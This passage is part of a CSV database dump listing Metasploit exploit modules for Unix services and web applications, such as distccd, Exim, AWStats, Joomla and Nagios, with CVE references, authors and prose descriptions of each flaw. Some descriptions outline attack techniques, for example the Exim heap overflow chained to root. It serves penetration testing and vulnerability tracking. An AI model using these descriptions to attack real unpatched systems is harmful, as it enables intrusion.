00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/misc/distcc_exec.rb","exploit","unix/misc/distcc_exec","exploit/unix/misc/distcc_exec","DistCC Daemon Command Execution",600,"This module uses a documented security weakness to execute arbitrary commands on any system running distccd.","Metasploit Framework License (BSD)","f","2002-02-01 00:00:00",0,,"aggressive","t","CVE-2004-2687, OSVDB-13378, URL-http://distcc.samba.org/security.html","hdm " 251,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/misc/qnx_qconn_exec.rb","exploit","unix/misc/qnx_qconn_exec","exploit/unix/misc/qnx_qconn_exec","QNX QCONN Remote Command Execution Vulnerability",600,"This module exploits a vulnerability in the qconn component of QNX Neutrino which can be abused to allow unauthenticated users to execute arbitrary commands under the context of the 'root' user.","Metasploit Framework License (BSD)","f","2012-09-04 00:00:00",0,,"aggressive","t","EDB-21520, OSVDB-86672, URL-http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos, URL-http://www.qnx.com/developers/docs/6.3.0SP3/neutrino/utilities/q/qconn.html","Brendan Coles , David Odell, Mor!p3r " 252,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/misc/spamassassin_exec.rb","exploit","unix/misc/spamassassin_exec","exploit/unix/misc/spamassassin_exec","SpamAssassin spamd Remote Command Execution",600,"This module exploits a flaw in the SpamAssassin spamd service by specifying a malicious vpopmail User header, when running with vpopmail and paranoid modes enabled (non-default). Versions prior to v3.1.3 are vulnerable","Metasploit Framework License (BSD)","f","2006-06-06 00:00:00",0,,"aggressive","t","BID-18290, CVE-2006-2447, OSVDB-26177, URL-http://spamassassin.apache.org/advisories/cve-2006-2447.txt","patrick " 253,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/misc/zabbix_agent_exec.rb","exploit","unix/misc/zabbix_agent_exec","exploit/unix/misc/zabbix_agent_exec","Zabbix Agent net.tcp.listen Command Injection",600,"This module exploits a metacharacter injection vulnerability in the FreeBSD and Solaris versions of the Zabbix agent. This flaw can only be exploited if the attacker can hijack the IP address of an authorized server (as defined in the configuration file).","Metasploit Framework License (BSD)","f","2009-09-10 00:00:00",0,,"aggressive","t","CVE-2009-4502, OSVDB-60956, URL-https://support.zabbix.com/browse/ZBX-1032","hdm " 254,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/smtp/clamav_milter_blackhole.rb","exploit","unix/smtp/clamav_milter_blackhole","exploit/unix/smtp/clamav_milter_blackhole","ClamAV Milter Blackhole-Mode Remote Code Execution",600,"This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter' (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable. When implemented with black hole mode enabled, it is possible to execute commands remotely due to an insecure popen call.","Metasploit Framework License (BSD)","t","2007-08-24 00:00:00",0,,"aggressive","t","BID-25439, CVE-2007-4560, EDB-4761, OSVDB-36909","patrick " 255,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/smtp/exim4_string_format.rb","exploit","unix/smtp/exim4_string_format","exploit/unix/smtp/exim4_string_format","Exim4 <= 4.69 string_format Function Heap Buffer Overflow",600,"This module exploits a heap buffer overflow within versions of Exim prior to version 4.69. By sending a specially crafted message, an attacker can corrupt the heap and execute arbitrary code with the privileges of the Exim daemon. The root cause is that no check is made to ensure that the buffer is not full prior to handling '%s' format specifiers within the 'string_vformat' function. In order to trigger this issue, we get our message rejected by sending a message that is too large. This will call into log_write to log rejection headers (which is a default configuration setting). After filling the buffer, a long header string is sent. In a successful attempt, it overwrites the ACL for the 'MAIL FROM' command. By sending a second message, the string we sent will be evaluated with 'expand_string' and arbitrary shell commands can be executed. It is likely that this issue could also be exploited using other techniques such as targeting in-band heap management structures, or perhaps even function pointers stored in the heap. However, these techniques would likely be far more platform specific, more complicated, and less reliable. This bug was original found and reported in December 2008, but was not properly handled as a security issue. Therefore, there was a 2 year lag time between when the issue was fixed and when it was discovered being exploited in the wild. At that point, the issue was assigned a CVE and began being addressed by downstream vendors. An additional vulnerability, CVE-2010-4345, was also used in the attack that led to the discovery of danger of this bug. This bug allows a local user to gain root privileges from the Exim user account. If the Perl interpreter is found on the remote system, this module will automatically exploit the secondary bug as well to get root.","Metasploit Framework License (BSD)","t","2010-12-07 00:00:00",0,,"aggressive","t","BID-45308, BID-45341, CVE-2010-4344, CVE-2010-4345, OSVDB-69685, URL-http://bugs.exim.org/show_bug.cgi?id=787, URL-http://git.exim.org/exim.git/commitdiff/24c929a27415c7cfc7126c47e4cad39acf3efa6b, URL-http://seclists.org/oss-sec/2010/q4/311, URL-http://www.gossamer-threads.com/lists/exim/dev/89477","hdm , jduck " 256,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/ssh/tectia_passwd_changereq.rb","exploit","unix/ssh/tectia_passwd_changereq","exploit/unix/ssh/tectia_passwd_changereq","Tectia SSH USERAUTH Change Request Password Reset Vulnerability",600,"This module exploits a vulnerability in Tectia SSH server for Unix-based platforms. The bug is caused by a SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request before password authentication, allowing any remote user to bypass the login routine, and then gain access as root.","Metasploit Framework License (BSD)","t","2012-12-01 00:00:00",0,,"aggressive","t","CVE-2012-5975, EDB-23082, OSVDB-88103, URL-http://seclists.org/fulldisclosure/2012/Dec/12, URL-http://www.ssh.com/index.php/component/content/article/531.html","bperry, kingcope, sinn3r " 257,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/awstats_configdir_exec.rb","exploit","unix/webapp/awstats_configdir_exec","exploit/unix/webapp/awstats_configdir_exec","AWStats configdir Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2 are vulnerable.","Metasploit Framework License (BSD)","f","2005-01-15 00:00:00",0,,"aggressive","t","BID-12298, CVE-2005-0116, OSVDB-13002, URL-http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities","Matteo Cantoni , hdm " 258,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/awstats_migrate_exec.rb","exploit","unix/webapp/awstats_migrate_exec","exploit/unix/webapp/awstats_migrate_exec","AWStats migrate Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based payloads are recommended with this module. The vulnerability is only present when AllowToUpdateStatsFromBrowser is enabled in the AWstats configuration file (non-default).","Metasploit Framework License (BSD)","f","2006-05-04 00:00:00",0,,"aggressive","t","BID-17844, CVE-2006-2237, EDB-1755, OSVDB-25284, URL-http://awstats.sourceforge.net/awstats_security_news.php","patrick " 259,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/awstatstotals_multisort.rb","exploit","unix/webapp/awstatstotals_multisort","exploit/unix/webapp/awstatstotals_multisort","AWStats Totals =< v1.14 multisort Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.","Metasploit Framework License (BSD)","f","2008-08-26 00:00:00",0,,"aggressive","t","BID-30856, CVE-2008-3922, OSVDB-47807, URL-http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt","patrick " 260,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/barracuda_img_exec.rb","exploit","unix/webapp/barracuda_img_exec","exploit/unix/webapp/barracuda_img_exec","Barracuda IMG.PL Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable.","Metasploit Framework License (BSD)","f","2005-09-01 00:00:00",0,,"aggressive","t","BID-14712, CVE-2005-2847, OSVDB-19279, URL-http://www.nessus.org/plugins/index.php?view=single&id=19556, URL-http://www.securiweb.net/wiki/Ressources/AvisDeSecurite/2005.1","Nicolas Gregoire , hdm " 261,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/base_qry_common.rb","exploit","unix/webapp/base_qry_common","exploit/unix/webapp/base_qry_common","BASE base_qry_common Remote File Include",600,"This module exploits a remote file inclusion vulnerability in the base_qry_common.php file in BASE 1.2.4 and earlier.","Metasploit Framework License (BSD)","f","2008-06-14 00:00:00",0,,"aggressive","t","BID-18298, CVE-2006-2685, OSVDB-49366","MC " 262,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/basilic_diff_exec.rb","exploit","unix/webapp/basilic_diff_exec","exploit/unix/webapp/basilic_diff_exec","Basilic 1.5.14 diff.php Arbitrary Command Execution",600,"This module abuses a metacharacter injection vulnerability in the diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary commands as the www-data user account.","Metasploit Framework License (BSD)","t","2012-06-28 00:00:00",0,,"aggressive","t","BID-54234, OSVDB-83719","juan vazquez , lcashdollar, sinn3r " 263,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/cacti_graphimage_exec.rb","exploit","unix/webapp/cacti_graphimage_exec","exploit/unix/webapp/cacti_graphimage_exec","Cacti graph_view.php Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the Raxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to 0.8.6-d are vulnerable.","Metasploit Framework License (BSD)","f","2005-01-15 00:00:00",0,,"aggressive","t","BID-14042, OSVDB-17539","David Maciejak , hdm " 264,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/cakephp_cache_corruption.rb","exploit","unix/webapp/cakephp_cache_corruption","exploit/unix/webapp/cakephp_cache_corruption","CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Code Execution",600,"CakePHP is a popular PHP framework for building web applications. The Security component of CakePHP is vulnerable to an unserialize attack which could be abused to allow unauthenticated attackers to execute arbitrary code with the permissions of the webserver.","Metasploit Framework License (BSD)","f","2010-11-15 00:00:00",0,,"aggressive","t","BID-44852, CVE-2010-4335, OSVDB-69352, URL-http://packetstormsecurity.org/files/view/95847/burnedcake.py.txt","Felix Wilhelm, tdz" 265,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb","exploit","unix/webapp/citrix_access_gateway_exec","exploit/unix/webapp/citrix_access_gateway_exec","Citrix Access Gateway Command Execution",600,"The Citrix Access Gateway provides support for multiple authentication types. When utilizing the external legacy NTLM authentication module known as ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command line utility to verify a user's identity and password. By embedding shell metacharacters in the web authentication form it is possible to execute arbitrary commands on the Access Gateway.","Metasploit Framework License (BSD)","f","2010-12-21 00:00:00",0,,"aggressive","t","BID-45402, CVE-2010-4566, OSVDB-70099, URL-http://www.vsecurity.com/resources/advisory/20101221-1/","Erwin Paternotte, George D. Gal" 266,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/coppermine_piceditor.rb","exploit","unix/webapp/coppermine_piceditor","exploit/unix/webapp/coppermine_piceditor","Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution",600,"This module exploits a vulnerability in the picEditor.php script of Coppermine Photo Gallery. When configured to use the ImageMagick library, the 'quality', 'angle', and 'clipval' parameters are not properly escaped before being passed to the PHP 'exec' command. In order to reach the vulnerable 'exec' call, the input must pass several validation steps. The vulnerabilities actually reside in the following functions: image_processor.php: rotate_image(...) include/imageObjectIM.class.php: imageObject::cropImage(...) include/imageObjectIM.class.php: imageObject::rotateImage(...) include/imageObjectIM.class.php: imageObject::resizeImage(...) include/picmgmt.inc.php: resize_image(...) NOTE: Use of the ImageMagick library is a non-default option. However, a user can specify its use at installation time.","Metasploit Framework License (BSD)","t","2008-01-30 00:00:00",0,,"aggressive","t","CVE-2008-0506, EDB-5019, OSVDB-41676, URL-http://forum.coppermine-gallery.net/index.php?topic=50103.0","Janek Vind, jduck " 267,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/datalife_preview_exec.rb","exploit","unix/webapp/datalife_preview_exec","exploit/unix/webapp/datalife_preview_exec","DataLife Engine preview.php PHP Code Injection",600,"This module exploits a PHP code injection vulnerability DataLife Engine 9.7. The vulnerability exists in preview.php, due to an insecure usage of preg_replace() with the e modifier, which allows to inject arbitrary php code, when there is a template installed which contains a [catlist] or [not-catlist] tag, even when the template isn't in use currently. The template can be configured with the TEMPLATE datastore option.","Metasploit Framework License (BSD)","f","2013-01-28 00:00:00",0,,"aggressive","t","BID-57603, CVE-2013-1412, EDB-24438, URL-http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html, URL-http://karmainsecurity.com/KIS-2013-01","EgiX, juan vazquez " 268,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/dogfood_spell_exec.rb","exploit","unix/webapp/dogfood_spell_exec","exploit/unix/webapp/dogfood_spell_exec","Dogfood CRM spell.php Remote Command Execution",600,"This module exploits a previously unpublished vulnerability in the Dogfood CRM mail function which is vulnerable to command injection in the spell check feature. Because of character restrictions, this exploit works best with the double-reverse telnet payload. This vulnerability was discovered by LSO and affects v2.0.10.","BSD License","f","2009-03-03 00:00:00",0,,"aggressive","t","OSVDB-54707, URL-http://downloads.sourceforge.net/dogfood/","LSO , patrick " 269,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/egallery_upload_exec.rb","exploit","unix/webapp/egallery_upload_exec","exploit/unix/webapp/egallery_upload_exec","EGallery PHP File Upload Vulnerability",600,"This module exploits a vulnerability found in EGallery 1.2 By abusing the uploadify.php file, a malicious user can upload a file to the egallery/ directory without any authentication, which results in arbitrary code execution. The module has been tested successfully on Ubuntu 10.04.","Metasploit Framework License (BSD)","f","2012-07-08 00:00:00",0,,"aggressive","t","BID-54464, OSVDB-83891, URL-http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html","Sammy FORGIT, juan vazquez " 270,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/foswiki_maketext.rb","exploit","unix/webapp/foswiki_maketext","exploit/unix/webapp/foswiki_maketext","Foswiki MAKETEXT Remote Command Execution",600,"This module exploits a vulnerability in the MAKETEXT Foswiki variable. By using a specially crafted MAKETEXT, a malicious user can execute shell commands since the input is passed to the Perl ""eval"" command without first being sanitized. The problem is caused by an underlying security issue in the CPAN:Locale::Maketext module. Only Foswiki sites that have user interface localization enabled (UserInterfaceInternationalisation variable set) are vulnerable. If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, if the FoswikiPage option isn't provided, the module will try to create a random page on the SandBox space. The modules has been tested successfully on Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image.","Metasploit Framework License (BSD)","f","2012-12-03 00:00:00",0,,"aggressive","t","CVE-2012-6329, OSVDB-88410, URL-http://foswiki.org/Support/SecurityAlert-CVE-2012-6330","Brian Carlson, juan vazquez " 271,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/generic_exec.rb","exploit","unix/webapp/generic_exec","exploit/unix/webapp/generic_exec","Generic Web Application Unix Command Execution",600,"This module can be used to exploit any generic command execution vulnerability for CGI applications on Unix-like platforms. To use this module, specify the CMDURI path, replacing the command itself with XXcmdXX. This module is currently limited to forms vulnerable through GET requests with query parameters.","Metasploit Framework License (BSD)","f","1993-11-14 00:00:00",0,,"aggressive","t",,"hdm " 272,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb","exploit","unix/webapp/google_proxystylesheet_exec","exploit/unix/webapp/google_proxystylesheet_exec","Google Appliance ProxyStyleSheet Command Execution",600,"This module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). The target appliance must be able to connect back to your machine for this exploit to work.","Metasploit Framework License (BSD)","f","2005-08-16 00:00:00",0,,"aggressive","t","BID-15509, CVE-2005-3757, OSVDB-20981","hdm " 273,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/guestbook_ssi_exec.rb","exploit","unix/webapp/guestbook_ssi_exec","exploit/unix/webapp/guestbook_ssi_exec","Matt Wright guestbook.pl Arbitrary Command Execution",600,"The Matt Wright guestbook.pl <= v2.3.1 CGI script contains a flaw that may allow arbitrary command execution. The vulnerability requires that HTML posting is enabled in the guestbook.pl script, and that the web server must have the Server-Side Include (SSI) script handler enabled for the '.html' file type. By combining the script weakness with non-default server configuration, it is possible to exploit this vulnerability successfully.","Metasploit Framework License (BSD)","f","1999-11-05 00:00:00",0,,"aggressive","t","BID-776, CVE-1999-1053, OSVDB-84","patrick " 274,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/hastymail_exec.rb","exploit","unix/webapp/hastymail_exec","exploit/unix/webapp/hastymail_exec","Hastymail 2.1.1 RC1 Command Injection",600,"This module exploits a command injection vulnerability found in Hastymail 2.1.1 RC1 due to the insecure usage of the call_user_func_array() function on the ""lib/ajax_functions.php"" script. Authentication is required on Hastymail in order to exploit the vulnerability. The module has been successfully tested on Hastymail 2.1.1 RC1 over Ubuntu 10.04.","Metasploit Framework License (BSD)","f","2011-11-22 00:00:00",0,,"aggressive","t","BID-50791, CVE-2011-4542, OSVDB-77331, URL-https://www.dognaedis.com/vulns/DGS-SEC-3.html","Bruno Teixeira, juan vazquez " 275,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb","exploit","unix/webapp/invision_pboard_unserialize_exec","exploit/unix/webapp/invision_pboard_unserialize_exec","Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution",600,"This module exploits a php unserialize() vulnerability in Invision IP.Board <= 3.3.4 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the webserver user. The dangerous unserialize() exists in the '/admin/sources/base/core.php' script, which is called with user controlled data from the cookie. The exploit abuses the __destruct() method from the dbMain class to write arbitrary PHP code to a file on the Invision IP.Board web directory. The exploit has been tested successfully on Invision IP.Board 3.3.4.","Metasploit Framework License (BSD)","f","2012-10-25 00:00:00",0,,"aggressive","t","BID-56288, CVE-2012-5692, EDB-22398, OSVDB-86702, URL-http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-critical-security-update/","EgiX, juan vazquez , sinn3r " 276,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb","exploit","unix/webapp/joomla_comjce_imgmanager","exploit/unix/webapp/joomla_comjce_imgmanager","Joomla Component JCE File Upload Remote Code Execution",600,"This module exploits a vulnerability in the JCE component for Joomla!, which could allow an unauthenticated remote attacker to upload arbitrary files, caused by the fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla 1.5.26.","Metasploit Framework License (BSD)","f","2012-08-02 00:00:00",0,,"aggressive","t","BID-49338, EDB-17734","Heyder Andrade , Unknown" 277,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/joomla_tinybrowser.rb","exploit","unix/webapp/joomla_tinybrowser","exploit/unix/webapp/joomla_tinybrowser","Joomla 1.5.12 TinyBrowser File Upload Code Execution",600,"This module exploits a vulnerability in the TinyMCE/tinybrowser plugin. This plugin is not secured in version 1.5.12 of joomla and allows the upload of files on the remote server. By renaming the uploaded file this vulnerability can be used to upload/execute code on the affected system.","Metasploit Framework License (BSD)","f","2009-07-22 00:00:00",0,,"aggressive","t","CVE-2011-4908, EDB-9296, OSVDB-64578, URL-http://developer.joomla.org/security/news/301-20090722-core-file-upload.html","spinbad " 278,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/mambo_cache_lite.rb","exploit","unix/webapp/mambo_cache_lite","exploit/unix/webapp/mambo_cache_lite","Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include",600,"This module exploits a remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 4.6.4 and earlier.","Metasploit Framework License (BSD)","f","2008-06-14 00:00:00",0,,"aggressive","t","BID-29716, CVE-2008-2905, OSVDB-46173","MC " 279,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/mitel_awc_exec.rb","exploit","unix/webapp/mitel_awc_exec","exploit/unix/webapp/mitel_awc_exec","Mitel Audio and Web Conferencing Command Injection",600,"This module exploits a command injection flaw within the Mitel Audio and Web Conferencing web interface.","Metasploit Framework License (BSD)","f","2010-12-12 00:00:00",0,,"aggressive","t","OSVDB-69934, URL-http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14","hdm " 280,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/mybb_backdoor.rb","exploit","unix/webapp/mybb_backdoor","exploit/unix/webapp/mybb_backdoor","myBB 1.6.4 Backdoor Arbitrary Command Execution",600,"myBB is a popular open source PHP forum software. Version 1.6.4 contained an unauthorized backdoor, distributed as part of the vendor's source package.","Metasploit Framework License (BSD)","f","2011-10-06 00:00:00",0,,"aggressive","t","BID-49993, SECUNIA-46300, URL-http://blog.mybb.com/2011/10/06/1-6-4-security-vulnerabilit/, URL-http://blog.mybb.com/wp-content/uploads/2011/10/mybb_1604_patches.txt","tdz" 281,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/nagios3_history_cgi.rb","exploit","unix/webapp/nagios3_history_cgi","exploit/unix/webapp/nagios3_history_cgi","Nagios3 history.cgi Host Command Execution",500,"This module abuses a command injection vulnerability in the Nagios3 history.cgi script.","Metasploit Framework License (BSD)","f","2012-12-09 00:00:00",0,,"aggressive","t","BID-56879, CVE-2012-6096, EDB-24084, OSVDB-88322, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2012-December/089125.html","Daniele Martini , Jose Selvi , Unknown , blasty " 282,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb","exploit","unix/webapp/nagios3_statuswml_ping","exploit/unix/webapp/nagios3_statuswml_ping","Nagios3 statuswml.cgi Ping Command Execution",600,"This module abuses a metacharacter injection vulnerability in the Nagios3 statuswml.cgi script. This flaw is triggered when shell metacharacters are present in the parameters to the ping and traceroute commands.","Metasploit Framework License (BSD)","f","2009-06-22 00:00:00",0,,"aggressive","t","CVE-2009-2288, OSVDB-55281","hdm " 283,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/nagios_graph_explorer.rb","exploit","unix/webapp/nagios_graph_explorer","exploit/unix/webapp/nagios_graph_explorer","Nagios XI Network Monitor Graph Explorer Component Command Injection",600,"This module exploits a vulnerability found in Nagios XI Network Monitor's component 'Graph Explorer'. An authenticated user can execute system commands by injecting it in several parameters, such as in visApi.php's 'host' parameter, which results in remote code execution.","Metasploit Framework License (BSD)","f","2012-11-30 00:00:00",0,,"aggressive","t","BID-54263, OSVDB-83552, URL-http://packetstormsecurity.org/files/118497/Nagios-XI-Network-Monitor-2011R1.9-OS-Command-Injection.html","Daniel Compton , sinn3r " 284,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/narcissus_backend_exec.rb","exploit","unix/webapp/narcissus_backend_exec","exploit/unix/webapp/narcissus_backend_exec","Narcissus Image Configuration Passthru Vulnerability",600,"This module exploits a vulnerability found in Narcissus image configuration function. This is due to the backend.php file not handling the $release parameter properly, and then passes it on to the configure_image() function. In this function, the $release parameter can be used to inject system commands for passthru (a PHP function that's meant to be used to run a bash script by the vulnerable application), which allows remote code execution under the context of the web server.","Metasploit Framework License (BSD)","f","2012-11-14 00:00:00",0,,"aggressive","t","EDB-22709, OSVDB-87410","Dun, sinn3r " 285,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/openemr_upload_exec.rb","exploit","unix/webapp/openemr_upload_exec","exploit/unix/webapp/openemr_upload_exec","OpenEMR PHP File Upload Vulnerability",600,"This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the ofc_upload_image.php file from the openflashchart library, a malicious user can upload a file to the tmp-upload-images directory without any authentication, which results in arbitrary code execution. The module has been tested successfully on OpenEMR 4.1.1 over Ubuntu 10.04.","Metasploit Framework License (BSD)","f","2013-02-13 00:00:00",0,,"aggressive","t","BID-37314, EBD-24492, OSVDB-90222, URL-http://www.open-emr.org/wiki/index.php/OpenEMR_Patches, URL-http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php","Gjoko Krstic , juan vazquez " 286,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/openview_connectednodes_exec.rb","exploit","unix/webapp/openview_connectednodes_exec","exploit/unix/webapp/openview_connectednodes_exec","HP Openview connectedNodes.ovpl Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the HP OpenView connectedNodes.ovpl CGI application. The results of the command will be displayed to the screen.","Metasploit Framework License (BSD)","f","2005-08-25 00:00:00",0,,"aggressive","t","BID-14662, CVE-2005-2773, OSVDB-19057","Valerio Tesei , hdm " 287,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/openx_banner_edit.rb","exploit","unix/webapp/openx_banner_edit","exploit/unix/webapp/openx_banner_edit","OpenX banner-edit.php File Upload PHP Code Execution",600,"This module exploits a vulnerability in the OpenX advertising software. In versions prior to version 2.8.2, authenticated users can upload files with arbitrary extensions to be used as banner creative content. By uploading a file with a PHP extension, an attacker can execute arbitrary PHP code. NOTE: The file must also return either ""png"", ""gif"", or ""jpeg"" as its image type as returned from the PHP getimagesize() function.","Metasploit Framework License (BSD)","f","2009-11-24 00:00:00",0,,"aggressive","t","BID-37110, CVE-2009-4098, OSVDB-60499, URL-http://archives.neohapsis.com/archives/bugtraq/2009-11/0166.html, URL-http://gynvael.coldwind.pl/?id=223, URL-http://gynvael.coldwind.pl/?id=224, URL-http://gynvael.coldwind.pl/?id=235, URL-http://php.net/manual/en/function.getimagesize.php, URL-http://programming.arantius.com/the+smallest+possible+gif, URL-http://stackoverflow.com/questions/2253404/what-is-the-smallest-valid-jpeg-file-size-in-bytes, URL-http://www.openx.org/docs/2.8/release-notes/openx-2.8.2, URL-https://developer.openx.org/jira/browse/OX-5747","jduck " 288,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb","exploit","unix/webapp/oracle_vm_agent_utl","exploit/unix/webapp/oracle_vm_agent_utl","Oracle VM Server Virtual Server Agent Command Injection",600,"This module exploits a command injection flaw within Oracle\'s VM Server Virtual Server Agent (ovs-agent) service. By including shell meta characters within the second parameter to the 'utl_test_url' XML-RPC methodCall, an attacker can execute arbitrary commands. The service typically runs with root privileges. NOTE: Valid credentials are required to trigger this vulnerable. The username appears to be hardcoded as 'oracle', but the password is set by the administrator at installation time.","Metasploit Framework License (BSD)","t","2010-10-12 00:00:00",0,,"aggressive","t","BID-44047, CVE-2010-3585, OSVDB-68797","jduck " 289,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/oscommerce_filemanager.rb","exploit","unix/webapp/oscommerce_filemanager","exploit/unix/webapp/oscommerce_filemanager","osCommerce 2.2 Arbitrary PHP Code Execution",600,"osCommerce is a popular open source E-Commerce application. The admin console contains a file management utility that allows administrators to upload, download, and edit files. This could be abused to allow unauthenticated attackers to execute arbitrary code with the permissions of the webserver.","Metasploit Framework License (BSD)","f","2009-08-31 00:00:00",0,,"aggressive","t","EDB-9556, OSVDB-60018","egypt " 290,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/pajax_remote_exec.rb","exploit","unix/webapp/pajax_remote_exec","exploit/unix/webapp/pajax_remote_exec","PAJAX Remote Command Execution",600,"RedTeam has identified two security flaws in PAJAX (<= 0.5.1). It is possible to execute arbitrary PHP code from unchecked user input. Additionally, it is possible to include arbitrary files on the server ending in "".class.php"".","Metasploit Framework License (BSD)","f","2006-03-30 00:00:00",0,,"aggressive","t","BID-17519, CVE-2006-1551, OSVDB-24618, URL-http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.php","Matteo Cantoni , hdm " 291,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_charts_exec.rb","exploit","unix/webapp/php_charts_exec","exploit/unix/webapp/php_charts_exec","PHP-Charts v1.0 PHP Code Execution Vulnerability",600,"This module exploits a PHP code execution vulnerability in php-Charts version 1.0 which could be abused to allow users to execute arbitrary PHP code under the context of the webserver user. The 'url.php' script calls eval() with user controlled data from any HTTP GET parameter name.","Metasploit Framework License (BSD)","f","2013-01-16 00:00:00",0,,"aggressive","t","BID-57448, EDB-24201, OSVDB-89334","AkaStep, Brendan Coles " 292,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_eval.rb","exploit","unix/webapp/php_eval","exploit/unix/webapp/php_eval","Generic PHP Code Evaluation",0,"Exploits things like It is likely that HTTP evasion options will break this exploit.","BSD License","f","2008-10-13 00:00:00",0,,"aggressive","t",,"egypt " 